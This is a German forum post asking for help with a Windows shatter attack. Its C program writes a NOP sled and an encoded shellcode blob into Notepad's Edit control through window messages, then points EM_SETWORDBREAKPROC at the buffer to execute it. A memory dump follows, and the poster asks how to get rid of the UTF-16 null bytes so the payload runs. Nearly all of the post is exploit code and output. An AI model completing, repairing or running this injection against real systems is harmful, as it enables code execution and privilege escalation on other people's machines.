SystemMessages Schwachstelle

#1 Ich versuche mit diesem Code den Shellcode in den Speicher zu schreiben.

Code

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char scode[] =
"hakin9\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x57"
"\x79\x9c\x92\x83\xeb\xfc\xe2\xf4\xab\x91\xd8\x92\x57\x79\x17\xd7"
"\x6b\xf2\xe0\x97\x2f\x78\x73\x19\x18\x61\x17\xcd\x77\x78\x77\xdb"
"\xdc\x4d\x17\x93\xb9\x48\x5c\x0b\xfb\xfd\x5c\xe6\x50\xb8\x56\x9f"
"\x56\xbb\x77\x66\x6c\x2d\xb8\x96\x22\x9c\x17\xcd\x73\x78\x77\xf4"
"\xdc\x75\xd7\x19\x08\x65\x9d\x79\xdc\x65\x17\x93\xbc\xf0\xc0\xb6"
"\x53\xba\xad\x52\x33\xf2\xdc\xa2\xd2\xb9\xe4\x9e\xdc\x39\x90\x19"
"\x27\x65\x31\x19\x3f\x71\x77\x9b\xdc\xf9\x2c\x92\x57\x79\x17\xfa"
"\x6b\x26\xad\x64\x37\x2f\x15\x6a\xd4\xb9\xe7\xc2\x3f\x07\x44\x70"
"\x24\x11\x04\x6c\xdd\x77\xcb\x6d\xb0\x1a\xf1\xf6\x79\x1c\xe4\xf7"
"\x77\x56\xff\xb2\x39\x1c\xe8\xb2\x22\x0a\xf9\xe0\x77\x1f\xee\xfb"
"\x23\x03\xbc\xfa\x36\x17\xef\xb2\x78\x18\xf8\xf6\x77\x5f\xba\xb2"
"\x39\x1c\xe8\xb2\x3b\x16\xff\xf3\x3b\x1e\xee\xfd\x22\x09\xbc\xf3"
"\x33\x14\xf5\xfc\x3e\x0a\xe8\xe0\x36\x0d\xf3\xe0\x32\x17\xbc\xbd"
"\x36\x1d\xf8\xb2\x31\x0b\xf5\xe6\x2d\x79\x9c\x92";

int main(int argc, char *argv[])
{
    HANDLE ParentWnd, ChildWnd;
    long scaddr;
    char *buf;
    
    ParentWnd = FindWindow("Notepad", NULL);
    if(ParentWnd == NULL){
         printf("You have to rund Notepad first!\n");
         system("PAUSE");
         return 1;
    }
    
    ChildWnd = FindWindowEx(ParentWnd, NULL, "Edit", NULL);
    if(ChildWnd == NULL){
         printf("Couldn't find Edit control!\n");
         system("PAUSE");
         return 1;
    }
    
    if(SendMessage(ChildWnd, EM_SETREADONLY, FALSE, 0) == 0){
        printf("Sending WM_SETREADONLY message failed!\n");
        system("PAUSE");
        return 1;
    }
    
    buf = malloc(strlen(scode)+1024*1024+1);
    buf = memset(buf, 0x90, 1024*1024);
    strcat(buf, scode);
    buf[strlen(buf)] = 0;
    
    SendMessage(ChildWnd, EM_SETLIMITTEXT, strlen(scode)+1024*1024+1, 0);
    if(!SendMessage(ChildWnd, WM_SETTEXT, 0, (LPARAM)buf)){
        printf("Sending WM_SETTEXT message failed!\n");
        system("PAUSE");
        return 1;
    }
    
    SendMessage(ChildWnd, EM_SETWORDBREAKPROC, 0L, 0x00D10020);
    SendMessage(ChildWnd, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);       
        
    system("PAUSE");
    
    return 0;
}

Shellcode

Code

00D10020  68 00 61 00 6B 00 69 00 6E 00 39 00 31 00 C9 00  h.a.k.i.n.9.1.É.
00D10030  92 01 E9 00 CB 00 D9 00 EE 00 D9 00 74 00 24 00  ?
é.Ë.Ù.î.Ù.t.$.
00D10040  F4 00 5B 00 81 00 73 00 13 00 57 00 79 00 53 01  ô.[.�.s..W.y.S

00D10050  19 20 92 01 EB 00 FC 00 E2 00 F4 00 AB 00 18 20   ?
ë.ü.â.ô.«.
00D10060  D8 00 19 20 57 00 79 00 17 00 D7 00 6B 00 F2 00  Ø. W.y..×.k.ò.
00D10070  E0 00 14 20 2F 00 78 00 73 00 19 00 18 00 61 00  à. /.x.s...a.
00D10080  17 00 CD 00 77 00 78 00 77 00 DB 00 DC 00 4D 00  .Í.w.x.w.Û.Ü.M.
00D10090  17 00 1C 20 B9 00 48 00 5C 00 0B 00 FB 00 FD 00  . ¹.H.\..û.ý.
00D100A0  5C 00 E6 00 50 00 B8 00 56 00 78 01 56 00 BB 00  \.æ.P.ž.V.x
V.».
00D100B0  77 00 66 00 6C 00 2D 00 B8 00 13 20 22 00 53 01  w.f.l.-.ž. ".S

00D100C0  17 00 CD 00 73 00 78 00 77 00 F4 00 DC 00 75 00  .Í.s.x.w.ô.Ü.u.
00D100D0  D7 00 19 00 08 00 65 00 9D 00 79 00 DC 00 65 00  ×...e.�.y.Ü.e.
00D100E0  17 00 1C 20 BC 00 F0 00 C0 00 B6 00 53 00 BA 00  . Œ.ð.À.¶.S.º.
00D100F0  AD 00 52 00 33 00 F2 00 DC 00 A2 00 D2 00 B9 00  ­.R.3.ò.Ü.¢.Ò.¹.
00D10100  E4 00 7E 01 DC 00 39 00 90 00 19 00 27 00 65 00  ä.~
Ü.9.�..'.e.
00D10110  31 00 19 00 3F 00 71 00 77 00 3A 20 DC 00 F9 00  1..?.q.w.: Ü.ù.
00D10120  2C 00 19 20 57 00 79 00 17 00 FA 00 6B 00 26 00  ,. W.y..ú.k.&.
00D10130  AD 00 64 00 37 00 2F 00 15 00 6A 00 D4 00 B9 00  ­.d.7./..j.Ô.¹.
00D10140  E7 00 C2 00 3F 00 07 00 44 00 70 00 24 00 11 00  ç.Â.?..D.p.$..
00D10150  04 00 6C 00 DD 00 77 00 CB 00 6D 00 B0 00 1A 00  .l.Ý.w.Ë.m.°..
00D10160  F1 00 F6 00 79 00 1C 00 E4 00 F7 00 77 00 56 00  ñ.ö.y..ä.÷.w.V.
00D10170  FF 00 B2 00 39 00 1C 00 E8 00 B2 00 22 00 0A 00  ÿ.².9..è.²."...
00D10180  F9 00 E0 00 77 00 1F 00 EE 00 FB 00 23 00 03 00  ù.à.w..î.û.#..
00D10190  BC 00 FA 00 36 00 17 00 EF 00 B2 00 78 00 18 00  Œ.ú.6..ï.².x..
00D101A0  F8 00 F6 00 77 00 5F 00 BA 00 B2 00 39 00 1C 00  ø.ö.w._.º.².9..
00D101B0  E8 00 B2 00 3B 00 16 00 FF 00 F3 00 3B 00 1E 00  è.².;..ÿ.ó.;..
00D101C0  EE 00 FD 00 22 00 09 00 BC 00 F3 00 33 00 14 00  î.ý."...Œ.ó.3..
00D101D0  F5 00 FC 00 3E 00 0A 00 E8 00 E0 00 36 00 0D 00  õ.ü.>...è.à.6...
00D101E0  F3 00 E0 00 32 00 17 00 BC 00 BD 00 36 00 1D 00  ó.à.2..Œ.œ.6..
00D101F0  F8 00 B2 00 31 00 0B 00 F5 00 E6 00 2D 00 79 00  ø.².1..õ.æ.-.y.
00D10200  53 01 19 20                                      S


Das Problem dabei ist dass im Speicher nicht hakin9 steht sondern h.a.k.i.n.9. Ich glaube dass deswegen der Shellcode nicht ausgeführt wird. Weiss jemand wie ich den Shellcode in den Speicher bringe ohne diese 00 dazwischen?